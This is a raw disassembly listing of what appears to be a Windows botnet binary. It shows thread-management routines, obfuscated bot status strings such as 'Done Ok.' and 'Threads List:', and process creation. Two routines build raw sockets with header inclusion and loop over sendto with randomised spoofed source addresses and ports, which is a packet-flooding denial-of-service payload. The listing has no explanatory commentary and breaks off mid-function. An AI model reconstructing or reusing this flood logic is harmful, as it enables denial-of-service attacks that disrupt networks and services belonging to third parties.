push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_4221F0
push 44h
lea eax, [ebp+var_58]
pop esi
push esi
push ebx
push eax
call sub_4221F0
add esp, 40h
lea eax, [ebp+var_14]
mov [ebp+var_58], esi
xor esi, esi
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_260]
push eax
inc esi
push ebx
push 28h
push esi
push ebx
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_4C], offset byte_44D6A4
mov [ebp+var_2C], esi
mov [ebp+var_28], bx
call dword_42F078 ; CreateProcessA
test eax, eax
jz short loc_41B7EF
push 0C8h
call dword_42F15C ; Sleep
push [ebp+var_14]
mov esi, dword_42F038
call esi ; dword_42F038
push [ebp+var_10]
call esi ; dword_42F038
call dword_454258 ; WSACleanup
push ebx
call dword_42F06C ; ExitProcess
loc_41B7EF: ; CODE XREF: sub_41B69D+128�j
push esi
call dword_42F06C ; ExitProcess
loc_41B7F6: ; CODE XREF: sub_41B69D+A3�j
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push offset sub_412267
push ebx
push ebx
call dword_42F158 ; CreateThread
mov esi, eax
cmp esi, ebx
jz short loc_41B81F
push 0FFFFFFFFh
push esi
call dword_42F064 ; WaitForSingleObject
push esi
call dword_42F038 ; CloseHandle
loc_41B81F: ; CODE XREF: sub_41B69D+170�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B69D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B824 proc near ; DATA XREF: sub_403B2C+5B69�o
var_1124 = byte ptr -1124h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1124h
call sub_4220C0
mov eax, [ebp+arg_0]
push esi
push edi
push 49h
pop ecx
mov esi, eax
lea edi, [ebp+var_124]
rep movsd
push [ebp+var_10]
mov edi, [ebp+var_124]
mov dword ptr [eax+120h], 1
lea eax, [ebp+var_A0]
push [ebp+var_C]
push eax
push edi
push [ebp+var_8]
lea eax, [ebp+var_120]
push [ebp+var_20]
push [ebp+var_14]
push [ebp+var_18]
push [ebp+var_1C]
push eax
call sub_41B8E7
push eax
push offset aXtyre1_rjar_xf ; "XtyrE1.RJaR.xfK1r.VuQwI."
lea eax, [ebp+var_1124]
push offset aSDoneOk_ ; "%s Done Ok."
push eax
call sub_422063
xor esi, esi
add esp, 38h
cmp [ebp+var_C], esi
jnz short loc_41B8B9
cmp [ebp+var_10], esi
jnz short loc_41B8BE
lea eax, [ebp+var_1124]
push eax
lea eax, [ebp+var_A0]
push eax
push edi
call sub_4104F6
add esp, 0Ch
loc_41B8B9: ; CODE XREF: sub_41B824+77�j
cmp [ebp+var_10], esi
jz short loc_41B8D5
loc_41B8BE: ; CODE XREF: sub_41B824+7C�j
lea eax, [ebp+var_1124]
push eax
lea eax, [ebp+var_A0]
push eax
push edi
call sub_410491
add esp, 0Ch
loc_41B8D5: ; CODE XREF: sub_41B824+98�j
push [ebp+var_20]
call sub_41C059
pop ecx
push esi
call dword_42F150 ; ExitThread
pop edi
pop esi
sub_41B824 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B8E7 proc near ; CODE XREF: sub_41B824+53�p
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 94h
push ebx
push esi
push edi
xor ecx, ecx
push 4
inc ecx
xor ebx, ebx
pop edx
xor eax, eax
cmp [ebp+arg_14], ecx
lea edi, [ebp+var_50]
mov [ebp+var_84], ebx
mov [ebp+var_80], ecx
mov [ebp+var_7C], 2
mov [ebp+var_78], edx
mov [ebp+var_74], 6
mov [ebp+var_70], 8
mov [ebp+var_6C], 0Ch
mov [ebp+var_68], 0Eh
mov [ebp+var_64], 15h
mov [ebp+var_60], 2Ch
mov [ebp+var_5C], 6Fh
mov [ebp+var_58], 0FFh
mov [ebp+var_54], ebx
stosd
mov esi, 200h
lea edi, [ebp+var_20]
mov [ebp+var_48], ebx
mov [ebp+var_44], ebx
mov [ebp+var_40], ebx
mov [ebp+var_3C], esi
mov [ebp+var_38], 2
mov [ebp+var_34], edx
mov [ebp+var_30], 10h
mov [ebp+var_2C], 1A0Ah
mov [ebp+var_28], ecx
mov [ebp+var_24], ebx
mov [ebp+var_18], ecx
stosd
jnz short loc_41B999
push offset dword_4552D0
call sub_4140CF
pop ecx
mov ebx, eax
jmp short loc_41B9BD
; ---------------------------------------------------------------------------
loc_41B999: ; CODE XREF: sub_41B8E7+A1�j
mov edi, 100h
push edi
call sub_423F55
pop ecx
mov ebx, eax
push edi
push ebx
call dword_454324 ; gethostname
push ebx
call dword_454398 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov ebx, [eax]
loc_41B9BD: ; CODE XREF: sub_41B8E7+B0�j
push 0FFh
push 3
push 2
call dword_42F29C ; socket
lea ecx, [ebp+var_18]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+arg_14], eax
call dword_42F2B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_41BA1B
push [ebp+arg_14]
call dword_42F298 ; closesocket
push [ebp+arg_10]
call sub_41C059
pop ecx
mov esi, offset dword_439638
mov ecx, [ebp+arg_18]
push esi
call sub_41074B
mov ecx, [ebp+arg_18]
push offset dword_43963C
push esi
call sub_410720
xor eax, eax
jmp loc_41BB8A
; ---------------------------------------------------------------------------
loc_41BA1B: ; CODE XREF: sub_41B8E7+FD�j
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_41BA44
push offset aStopped_ ; "Stopped."
push 8
push edi
push edi
push [ebp+arg_24]
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_1C]
call sub_41C090
add esp, 20h
loc_41BA44: ; CODE XREF: sub_41B8E7+13E�j
push esi
call sub_422F79
mov edi, dword_42F164
pop ecx
mov [ebp+arg_18], eax
call edi ; dword_42F164
push [ebp+arg_0]
mov [ebp+arg_10], eax
call dword_45434C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_94], 2
call dword_42F2B8 ; ntohs
mov [ebp+var_92], ax
jmp loc_41BB5E
; ---------------------------------------------------------------------------
loc_41BA86: ; CODE XREF: sub_41B8E7+288�j
call sub_4220FC
cdq
mov ecx, 0FFh
and ebx, 0FFFFFFh
idiv ecx
shl edx, 18h
or ebx, edx
call sub_4220FC
cdq
mov ecx, 0F4h
idiv ecx
mov [ebp+var_4C], edx
call sub_4220FC
cdq
mov ecx, 1FA4h
mov [ebp+var_14], 45h
idiv ecx
mov [ebp+var_13], 4
mov [ebp+var_1C], edx
call sub_4220FC
mov [ebp+var_10], ax
call sub_4220FC
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_48]
push eax
call dword_454314 ; ntohs
push esi
mov [ebp+var_E], ax
call dword_454314 ; ntohs
or [ebp+var_C], 0FFh
mov [ebp+var_12], ax
call sub_4220FC
push 0Eh
mov [ebp+var_8], ebx
cdq
pop ecx
idiv ecx
push [ebp+arg_0]
mov al, byte ptr [ebp+edx*4+var_84]
mov [ebp+var_B], al
call dword_45434C ; inet_addr
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push 14h
push eax
call sub_414271
mov [ebp+var_A], ax
lea eax, [ebp+var_14]
push 14h
push eax
push [ebp+arg_18]
call sub_4223F0
add esp, 14h
lea eax, [ebp+var_94]
push 10h
push eax
push 0
push esi
push [ebp+arg_18]
push [ebp+arg_14]
call dword_454370 ; sendto
push [ebp+arg_C]
call dword_42F15C ; Sleep
loc_41BB5E: ; CODE XREF: sub_41B8E7+19A�j
call edi ; dword_42F164
sub eax, [ebp+arg_10]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+arg_8]
jbe loc_41BA86
push [ebp+arg_18]
call sub_4230B3
pop ecx
push [ebp+arg_14]
call dword_4543AC ; closesocket
xor eax, eax
inc eax
loc_41BB8A: ; CODE XREF: sub_41B8E7+12F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B8E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB8F proc near ; DATA XREF: sub_403B2C+5DA7�o
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_14C = byte ptr -14Ch
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 250h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_250]
rep movsd
xor esi, esi
inc esi
mov [eax+1A4h], esi
mov eax, [ebp+var_250]
mov [ebp+arg_0], eax
lea eax, [ebp+var_24C]
push eax
call sub_4140CF
pop ecx
mov [ebp+var_10], eax
push 8
xor edx, edx
pop ecx
mov ebx, 0FFh
xor eax, eax
cmp [ebp+var_B0], 1
lea edi, [ebp+var_64]
mov [ebp+var_98], edx
mov [ebp+var_94], esi
mov [ebp+var_90], 2
mov [ebp+var_8C], 4
mov [ebp+var_88], 6
mov [ebp+var_84], ecx
mov [ebp+var_80], 0Ch
mov [ebp+var_7C], 11h
mov [ebp+var_78], 16h
mov [ebp+var_74], 29h
mov [ebp+var_70], 3Ah
mov [ebp+var_6C], ebx
mov [ebp+var_68], edx
mov [ebp+var_2C], esi
mov esi, 200h
stosd
lea edi, [ebp+var_34]
mov [ebp+var_5C], edx
mov [ebp+var_58], edx
mov [ebp+var_54], edx
mov [ebp+var_50], esi
mov [ebp+var_4C], ecx
mov [ebp+var_48], 1000h
mov [ebp+var_44], 2000h
mov [ebp+var_40], 3FFFh
mov [ebp+var_3C], ebx
mov [ebp+var_38], edx
stosd
jnz short loc_41BC82
push offset dword_4552D0
call sub_4140CF
pop ecx
jmp short loc_41BCA8
; ---------------------------------------------------------------------------
loc_41BC82: ; CODE XREF: sub_41BB8F+E4�j
lea eax, [ebp+var_24C]
push 100h
push eax
call dword_42F2A8 ; gethostname
lea eax, [ebp+var_24C]
push eax
call dword_42F274 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_41BCA8: ; CODE XREF: sub_41BB8F+F1�j
push ebx
push 3
push 2
mov [ebp+var_4], eax
call dword_42F29C ; socket
lea ecx, [ebp+var_2C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_8], eax
call dword_42F2B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_41BD06
push [ebp+var_8]
call dword_42F298 ; closesocket
push [ebp+var_CC]
call sub_41C059
pop ecx
mov esi, offset dword_439638
mov ecx, [ebp+arg_0]
push esi
call sub_41074B
mov ecx, [ebp+arg_0]
push offset dword_43963C
push esi
call sub_410720
jmp loc_41BECE
; ---------------------------------------------------------------------------
loc_41BD06: ; CODE XREF: sub_41BB8F+13F�j
push 8
call sub_41C235
test eax, eax
pop ecx
jle short loc_41BD39
push offset aStopped_ ; "Stopped."
push 8
push edi
push edi
push [ebp+var_B8]
lea eax, [ebp+var_14C]
push [ebp+var_B4]
push [ebp+arg_0]
push eax
call sub_41C090
add esp, 20h
loc_41BD39: ; CODE XREF: sub_41BB8F+181�j
push esi
call sub_422F79
mov edi, dword_42F2B8
pop ecx
push [ebp+var_C8]
mov [ebp+var_C], eax
mov eax, [ebp+var_10]
mov [ebp+var_A8], 2
mov [ebp+var_A4], eax
call edi ; dword_42F2B8
mov [ebp+var_A6], ax
call dword_42F164 ; GetTickCount
mov [ebp+var_14], eax
jmp loc_41BE46
; ---------------------------------------------------------------------------
loc_41BD78: ; CODE XREF: sub_41BB8F+2CF�j
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_4]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_4], edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_60], edx
call sub_4220FC
cdq
mov ecx, 1FA4h
mov [ebp+var_28], 45h
idiv ecx
mov [ebp+var_27], 4
mov [ebp+var_30], edx
call sub_4220FC
mov [ebp+var_24], ax
call sub_4220FC
push 0Bh
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_5C]
push eax
call edi ; dword_42F2B8
push esi
mov [ebp+var_22], ax
call edi ; dword_42F2B8
mov [ebp+var_26], ax
mov [ebp+var_20], bl
call sub_4220FC
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_98]
mov [ebp+var_1F], al
mov eax, [ebp+var_4]
mov [ebp+var_1C], eax
mov eax, [ebp+var_10]
mov [ebp+var_18], eax
lea eax, [ebp+var_28]
push eax
call sub_414271
mov [ebp+var_1E], ax
lea eax, [ebp+var_28]
push 14h
push eax
push [ebp+var_C]
call sub_4223F0
add esp, 14h
lea eax, [ebp+var_A8]
push 10h
push eax
push 0
push esi
push [ebp+var_C]
push [ebp+var_8]
call dword_42F2A4 ; sendto
push [ebp+var_C0]
call dword_42F15C ; Sleep
loc_41BE46: ; CODE XREF: sub_41BB8F+1E4�j
call dword_42F164 ; GetTickCount
sub eax, [ebp+var_14]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_C4]
jbe loc_41BD78
push [ebp+var_C]
call sub_4230B3
pop ecx
push [ebp+var_8]
call dword_42F298 ; closesocket
push [ebp+var_CC]
call sub_41C059
xor ebx, ebx
pop ecx
cmp [ebp+var_B4], ebx
mov edi, offset aZshqz13bz2w1 ; "ZsHqZ13bZ2w1"
mov esi, offset aSDone_ ; "%s Done."
jnz short loc_41BEB2
cmp [ebp+var_B8], ebx
jnz short loc_41BEBA
push edi
lea eax, [ebp+var_14C]
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 10h
loc_41BEB2: ; CODE XREF: sub_41BB8F+305�j
cmp [ebp+var_B8], ebx
jz short loc_41BECE
loc_41BEBA: ; CODE XREF: sub_41BB8F+30D�j
push edi
lea eax, [ebp+var_14C]
push esi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 10h
loc_41BECE: ; CODE XREF: sub_41BB8F+172�j
; sub_41BB8F+329�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41BB8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BED7 proc near ; CODE XREF: sub_401477+ED�p
; sub_40178D+BF�p ...
var_FE8 = byte ptr -0FE8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 0FE8h
lea eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_FE8]
push [ebp+arg_4]
push 0FE6h
push eax
call sub_423640
add esp, 10h
xor edi, edi
mov eax, offset dword_46C408
loc_41BF03: ; CODE XREF: sub_41BED7+3C�j
cmp byte ptr [eax], 0
jz short loc_41BF17
add eax, 1018h
inc edi
cmp eax, offset dword_630E38
jl short loc_41BF03
jmp short loc_41BF53
; ---------------------------------------------------------------------------
loc_41BF17: ; CODE XREF: sub_41BED7+2F�j
push esi
mov esi, edi
imul esi, 1018h
lea eax, [ebp+var_FE8]
push 0FFFh
push eax
lea eax, dword_46C408[esi]
push eax
call sub_4222F0
mov eax, [ebp+arg_0]
and dword_46D40C[esi], 0
add esp, 0Ch
and dword_46D410[esi], 0
mov dword_46D408[esi], eax
pop esi
loc_41BF53: ; CODE XREF: sub_41BED7+3E�j
mov eax, edi
pop edi
leave
retn
sub_41BED7 endp
; =============== S U B R O U T I N E =======================================
sub_41BF58 proc near ; CODE XREF: sub_403B2C+A15�p
; sub_41BFDA+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_41BFD4
cmp esi, 1C2h
jge short loc_41BFD4
imul esi, 1018h
push edi
push ebx
lea edi, dword_46D414[esi]
push dword ptr [edi]
call dword_42F048 ; TerminateThread
cmp [edi], ebx
jz short loc_41BF8A
inc ebp
loc_41BF8A: ; CODE XREF: sub_41BF58+2F�j
mov [edi], ebx
lea edi, dword_46D410[esi]
mov dword_46D408[esi], ebx
mov dword_46D40C[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_41BFAB
push eax
call sub_4188DB
pop ecx
loc_41BFAB: ; CODE XREF: sub_41BF58+4A�j
mov [edi], ebx
lea edi, dword_46D418[esi]
mov byte ptr dword_46C408[esi], bl
push dword ptr [edi]
call dword_4543AC ; closesocket
lea esi, dword_46D41C[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_4543AC ; closesocket
mov [esi], ebx
pop edi
loc_41BFD4: ; CODE XREF: sub_41BF58+D�j
; sub_41BF58+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41BF58 endp
; =============== S U B R O U T I N E =======================================
sub_41BFDA proc near ; CODE XREF: sub_403B2C+9BD�p
; sub_412267+54E�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_46C408
loc_41BFE6: ; CODE XREF: sub_41BFDA+2A�j
cmp byte ptr [esi], 0
jz short loc_41BFF7
push edi
call sub_41BF58
test eax, eax
pop ecx
jz short loc_41BFF7
inc ebx
loc_41BFF7: ; CODE XREF: sub_41BFDA+F�j
; sub_41BFDA+1A�j
add esi, 1018h
inc edi
cmp esi, offset dword_630E38
jl short loc_41BFE6
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41BFDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C00C proc near ; CODE XREF: sub_41C090+1A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_46D40C
loc_41C020: ; CODE XREF: sub_41C00C+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41C042
test edi, edi
jle short loc_41C034
cmp [esi], edi
jz short loc_41C034
cmp ebx, edi
jnz short loc_41C042
loc_41C034: ; CODE XREF: sub_41C00C+1E�j
; sub_41C00C+22�j
push ebx
call sub_41BF58
test eax, eax
pop ecx
jz short loc_41C042
inc [ebp+var_4]
loc_41C042: ; CODE XREF: sub_41C00C+1A�j
; sub_41C00C+26�j ...
add esi, 1018h
inc ebx
cmp esi, offset dword_631E3C
jl short loc_41C020
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41C00C endp
; =============== S U B R O U T I N E =======================================
sub_41C059 proc near ; CODE XREF: sub_40178D+16B�p
; sub_401906+166�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 1018h
mov dword_46D414[eax], ecx
mov dword_46D408[eax], ecx
mov dword_46D40C[eax], ecx
mov dword_46D410[eax], ecx
mov dword_46D418[eax], ecx
mov dword_46D41C[eax], ecx
mov byte ptr dword_46C408[eax], cl
retn
sub_41C059 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C090 proc near ; CODE XREF: sub_403B2C+631D�p
; sub_403B2C+6333�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_14], eax
jz short loc_41C0A3
push [ebp+arg_14]
call sub_422B5A
pop ecx
loc_41C0A3: ; CODE XREF: sub_41C090+8�j
push ebx
push esi
push edi
push eax
push [ebp+arg_18]
call sub_41C00C
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
mov esi, offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
jle short loc_41C0FD
cmp [ebp+arg_8], 0
mov edi, offset aSSDThreadSStop ; "%s %s (%d thread(s) stopped)."
jnz short loc_41C0E1
cmp [ebp+arg_C], 0
jnz short loc_41C0E7
push ebx
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 18h
loc_41C0E1: ; CODE XREF: sub_41C090+35�j
cmp [ebp+arg_C], 0
jz short loc_41C13E
loc_41C0E7: ; CODE XREF: sub_41C090+3B�j
push ebx
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_410491
add esp, 18h
jmp short loc_41C13E
; ---------------------------------------------------------------------------
loc_41C0FD: ; CODE XREF: sub_41C090+2A�j
xor ebx, ebx
mov edi, offset aSNoSThreadFoun ; "%s No %s thread found."
cmp [ebp+arg_8], ebx
jnz short loc_41C126
cmp [ebp+arg_C], ebx
jnz short loc_41C12B
cmp [ebp+arg_10], ebx
jz short loc_41C13E
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 14h
loc_41C126: ; CODE XREF: sub_41C090+77�j
cmp [ebp+arg_C], ebx
jz short loc_41C13E
loc_41C12B: ; CODE XREF: sub_41C090+7C�j
push [ebp+arg_1C]
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_410491
add esp, 14h
loc_41C13E: ; CODE XREF: sub_41C090+55�j
; sub_41C090+6B�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C090 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C143 proc near ; DATA XREF: sub_403B2C+B70�o
var_244 = dword ptr -244h
var_240 = byte ptr -240h
var_1C0 = dword ptr -1C0h
var_1B0 = dword ptr -1B0h
var_18C = dword ptr -18Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 244h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_244]
push offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
rep movsd
mov ecx, [ebp+var_244]
mov dword ptr [eax+0BCh], 1
mov eax, [ebp+var_18C]
push offset aSThreadsList ; "%s Threads List:"
mov [ebp+var_4], eax
mov [ebp+arg_0], ecx
test eax, eax
lea eax, [ebp+var_240]
push eax
push ecx
jnz short loc_41C19A
call sub_4104F6
jmp short loc_41C19F
; ---------------------------------------------------------------------------
loc_41C19A: ; CODE XREF: sub_41C143+4E�j
call sub_410491
loc_41C19F: ; CODE XREF: sub_41C143+55�j
add esp, 10h
xor ebx, ebx
mov edi, offset dword_46C408
mov esi, offset aD_S ; "%d. %s"
loc_41C1AE: ; CODE XREF: sub_41C143+B0�j
cmp byte ptr [edi], 0
jz short loc_41C1E6
xor eax, eax
cmp [ebp+var_1B0], eax
jnz short loc_41C1C5
cmp [edi+1004h], eax
jnz short loc_41C1E6
loc_41C1C5: ; CODE XREF: sub_41C143+78�j
cmp [ebp+var_4], eax
push edi
push ebx
lea eax, [ebp+var_240]
push esi
push eax
push [ebp+arg_0]
jnz short loc_41C1DE
call sub_4104F6
jmp short loc_41C1E3
; ---------------------------------------------------------------------------
loc_41C1DE: ; CODE XREF: sub_41C143+92�j
call sub_410491
loc_41C1E3: ; CODE XREF: sub_41C143+99�j
add esp, 14h
loc_41C1E6: ; CODE XREF: sub_41C143+6E�j
; sub_41C143+80�j
add edi, 1018h
inc ebx
cmp edi, offset dword_630E38
jl short loc_41C1AE
cmp [ebp+var_4], 0
pop edi
pop esi
pop ebx
lea eax, [ebp+var_240]
push offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
push offset aSEndOfList_ ; "%s End of list."
push eax
push [ebp+arg_0]
jnz short loc_41C219
call sub_4104F6
jmp short loc_41C21E
; ---------------------------------------------------------------------------
loc_41C219: ; CODE XREF: sub_41C143+CD�j
call sub_410491
loc_41C21E: ; CODE XREF: sub_41C143+D4�j
add esp, 10h
push [ebp+var_1C0]
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_41C143 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C235 proc near ; CODE XREF: sub_401408+5�p
; sub_401477+28�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_46D408
loc_41C23C: ; CODE XREF: sub_41C235+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_41C245
inc eax
loc_41C245: ; CODE XREF: sub_41C235+D�j
add ecx, 1018h
cmp ecx, offset dword_631E38
jl short loc_41C23C
retn
sub_41C235 endp
; =============== S U B R O U T I N E =======================================
sub_41C254 proc near ; CODE XREF: sub_40281E+C�p
; sub_403B2C+A9D�p ...
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_46D408
push esi
loc_41C25E: ; CODE XREF: sub_41C254+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_41C277
add ecx, 1018h
inc edx
cmp ecx, offset dword_631E38
jl short loc_41C25E
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C277: ; CODE XREF: sub_41C254+10�j
mov eax, edx
pop esi
retn
sub_41C254 endp
; =============== S U B R O U T I N E =======================================
sub_41C27B proc near ; CODE XREF: sub_41CE88+23�p
push esi
mov esi, ecx
call sub_41CE5C
mov eax, esi
pop esi
retn
sub_41C27B endp
; =============== S U B R O U T I N E =======================================
sub_41C287 proc near ; CODE XREF: sub_41CDB7+3�p
and dword ptr [ecx], 0
and dword ptr [ecx+4], 0
mov dword ptr [ecx+8], 67452301h
mov dword ptr [ecx+0Ch], 0EFCDAB89h
mov dword ptr [ecx+10h], 98BADCFEh
mov dword ptr [ecx+14h], 10325476h
retn
sub_41C287 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C2AB proc near ; CODE XREF: sub_41CC38+45�p
; sub_41CC38+64�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
mov eax, [ebp+arg_0]
xor edx, edx
push ebx
push esi
mov dh, [eax+3]
push edi
